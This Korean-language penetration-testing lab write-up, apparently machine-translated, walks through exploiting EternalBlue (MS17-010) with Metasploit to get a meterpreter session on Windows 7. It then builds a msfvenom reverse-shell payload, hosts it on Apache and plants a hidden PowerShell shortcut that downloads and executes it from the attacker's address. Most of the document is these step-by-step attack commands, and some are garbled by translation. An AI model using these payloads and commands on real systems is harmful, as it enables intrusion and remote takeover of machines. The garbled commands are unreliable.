실험 2 KALI 와 Metasploit 기반 침투 테스트
2.1 실험명
" KALI 와 Metasploit 기반 침투 테스트 "
1. 침투 테스트 방법에 익숙하신 분
2. 침투 테스트 도구 Kali 및 Metasploit 사용에 익숙합니다.
2. 칼리 에서 1~2개의 공격툴을선택 .
공격 1: MSF를 사용하여 "Eternal Blue" 취약점 재현
실험 환경: Win 7 (방화벽을 끄고 SMB 서비스 활성화 );
칼리 리눅스 ( 메타스플로잇 - 프레임워크 6.2.26 )
1 메타스플로 잇 시작 _
터미널에 msfconsole을 입력하세요.
2 쿼리 활용 모듈
사용할 수 있는 모듈을 확인하려면 터미널에 검색 ms 17_010 을 입력하세요 .
![](https://img-blog.csdnimg.cn/direct/c33ea1fa3ef341849738a874c44e8f0f.png)
3 감지 모듈 사용
터미널 에 useaux / scanner / smb / smb_ms 17_010 을 입력하세요 .
4감지 범위 설정
RHOSTS를 구성해야 하는 터미널에 show options를 입력합니다 .
![](https://img-blog.csdnimg.cn/direct/f5fbe6eff39040e5a3458f2b576287e8.png)
터미널에 set rhosts 192.168.3.0/24 를 입력하거나 ( 현재 네트워크 세그먼트를 검색하도록 설정 ) set rhosts 192.168.3.1 - 192.168.3.10 범위를 설정할 수 있습니다 .
5 감지 시작
감지를 실행하려면 터미널에 run을 입력하세요 .
![](https://img-blog.csdnimg.cn/direct/2a3fe80dc09548d5b8fe617481ee1d8c.png)
위 그림에 따르면 IP 주소가 192.168.3.8 인 시스템에 취약점이 있음을 알 수 있습니다.
6 취약점 악용 시작
먼저 터미널에 ms 17_010 검색을 입력 하고 모듈 사용을 사용하십시오.
익스플로잇 / windows / smb / ms 17_010_ Eternalblue 。
![](https://img-blog.csdnimg.cn/direct/9cda4c95c2e04f32afab27de9a18cbe8.png)
7 활용 모듈 구성
모듈 표시 옵션을 구성하여 대상 머신 세트 rhost 192.168.3.8을 구성합니다. 여기에 다섯 번째 단계에서 검색된 IP를 입력합니다 .
8 공격을 수행한다
터미널에 run 을 입력하세요 . 승리를 본다는 것은 공격이 성공했다는 것을 의미하며 당신은 미터프리터를 얻게 됩니다 .
![](https://img-blog.csdnimg.cn/direct/982133f7f7274a35b541be0bc926ba04.png)
공격 2: "Stuxnet III" 리바운드 쉘
실험 환경: Win 10 (방화벽 꺼짐 );
칼리 리눅스 ( 메타스플로잇 - 프레임워크 6.2.26 )
1. MSF를 사용하여 백도어 생성
msf 내에 입력 : msfvenom - p windows /x64/ meterpreter / reverse _ tcp lhost = 192 .168.3.23 lport =4456 - fph - Reflection >/ var / www / html / link . ps 1
2. kali 에서 Apache 2 를 엽니다.
터미널에 입력: service apache 2 start
3. 제어되는 컴퓨터에 바로가기 만들기
powershell - 창 스타일 숨김 - exec 우회 -c " IEX ( 새 항목 - 개체
그물 . 웹클라이언트 ). DownloadString (' http://192.168.204.135/link.ps1 '); 시험 . 추신 1"
![](https://img-blog.csdnimg.cn/direct/21ac98ac88724f7a9f3758867472113d.png)
4 MSF 터미널 로 돌아가서 모니터링을 구성합니다.
msf 내로 진입 : 익스플로잇 / 멀티 / 핸들러 사용
5 페이로드 구성 _
페이로드 창 설정 /x64/ meterpreter / reverse _ tcp
![](https://img-blog.csdnimg.cn/direct/929dffca984b40289900d87a01d3a60c.png)
msf 에 입력 : 옵션 구성 페이로드 표시
![](https://img-blog.csdnimg.cn/direct/5c8f048d1c5c4d59abef27e4304f27c4.png)
LHOST 및 LPORT를 설정하고 maf 에 입력합니다 .
lhost 설정 < 현재 컴퓨터 IP > LHOST 설정
lport 설정 < 비어 있는 포트 > LPORT 설정
![](https://img-blog.csdnimg.cn/direct/7239dbff6c1b462ca2130bc5d9f069ea.png)
6. 모니터링 실행
msf 에 입력 : 실행 또는 악용
![](https://img-blog.csdnimg.cn/direct/de7b96c5419d42958cada61d19e4390c.png)
대상 컴퓨터에 들어가서 대상 컴퓨터에서 만든 바로 가기를 실행하고 잠시 기다려 미터 프리터를 얻습니다 .
![](https://img-blog.csdnimg.cn/direct/1abd64ef0e9349c1a72a72a981e331bc.png)
공격 1: MSF를 사용하여 'Eternal Blue ' 취약점 재현
CVE -2017-0144 (Eternal Blue라고도 함)는 2017년 4월 14일 저녁 에 처음 발생했습니다. Windows 시스템 의 SMB 프로토콜 취약점을 이용하여 시스템 의 최고 권한을 얻어 손상된 시스템을 제어하는 방법입니다. 컴퓨터. 2017년 5월 12일 에도 범죄자들은 " Eternal Blue"를 수정하여 랜섬웨어 바이러스를 전 세계적 으로 대규모 랜섬웨어 공격을 일으키고 심지어 학교 , 대기업, 정부 및 기타 기관에 영향을 미쳤습니다 . 파일 .
SMB 는 프로토콜 서버 정보 블록입니다. 클라이언트 / 서버, 요청 / 응답 프로토콜입니다. SMB 프로토콜을 통해 파일, 프린터, 명명된 파이프와 같은 리소스를 컴퓨터 간에 공유할 수 있습니다. 컴퓨터의 네트워크 환경은 SMB 로 구현 됩니다. SMB 프로토콜은 애플리케이션 계층과 세션 계층에서 작동하며 TCP / IP 프로토콜 위에서 사용할 수 있습니다. SMB는 TCP 포트 139 와 TCP 포트 445를 사용합니다 .
SMB 작동 방식 :
( 1 ) 먼저 클라이언트는 SMB negport 요청 데이터그램을 보내고 지원하는 모든 SMB 프로토콜 버전을 나열 합니다 . 요청 메시지를 받은 후 서버는 요청에 응답하고 사용하려는 SMB 프로토콜 버전을 나열합니다. 사용할 수 있는 0 XFFFFH를 반환 하고 통신을 종료한다.
( 2 ) 프로토콜이 결정된 후 클라이언트 프로세스는 서버에 대한 사용자 또는 공유 인증을 시작하며, 이 프로세스는 SessionupX 요청 패킷을 전송하여 구현됩니다. 클라이언트는 사용자 이름과 비밀번호 또는 간단한 비밀번호를 서버에 보내고 , 서버는 SessionupX 응답 패킷을 보내 연결을 허용하거나 거부합니다 .
( 3 ) 클라이언트와 서버가 협상과 인증을 완료하면 Tcon 또는 TconX SMB 데이터그램을 보내고 액세스하려는 네트워크 리소스의 이름을 나열한 다음 연결을 나타내는 TconX 응답 데이터그램을 보냅니다. 아니면 거절하세요.
( 4 ) 해당 리소스에 연결한 후 SMB 클라이언트는 SMB 열기 를 통해 파일을 열고 , SMB 읽기를 통해 파일을 읽고 , SMB 쓰기를 통해 파일을 쓰고 , SMB 닫기 를 통해 파일을 닫을 수 있습니다 .
Eternal Blue는 Windows SMB 서비스가 SMB v1 요청을 처리할 때 발생하는 취약점으로, 이 취약점을 공격자 는 대상 시스템에서 임의 코드를 실행할 수 있습니다 . Eternal Blue 취약점을 통해 445 파일 공유 포트 가 열려 있는 Windows 시스템을 검사 하며, 범죄자는 사용자 조작 없이 컴퓨터와 서버가 켜져 있는 한 랜섬웨어 인터넷에 연결되어 있습니다 . 악성 프로그램.
2017년 6 월 13일 마이크로소프트는 CVE-2017-8464 라는 취약점 공지를 공식 발표했는데, 공식적으로는 윈도우 시스템에 바로가기 구문 분석 시 임의의 코드를 원격으로 실행할 수 있는 고위험 취약점이 있다고 소개했다.해커는 U 디스크를 통해 이를 실행할 수 있다. , 네트워크 공유 등 취약점, 사용자 시스템의 완전한 제어 및 보안 위험의 고위험 일반적으로 lnk 입니다 . lnk 는 Windows 시스템 에 있는 응용 프로그램 바로 가기 파일의 파일 형식 접미사 입니다 . 공격받은 머신이 공격 lnk가 포함된 USB 디스크를 삽입한 후 쉘이 리바운드 됩니다 . 심지어 격리된 인트라넷도 인터넷에 접속하지 않고도 공격을 받을 수 있습니다.
본 취약점은 악성 바로가기를 생성하고, 악성 실행 스크립트를 포함하고 있으며, 악성 바로가기를 클릭하여 컴퓨터를 바이러스에 감염시켜 원격으로 제어할 수 있게 합니다.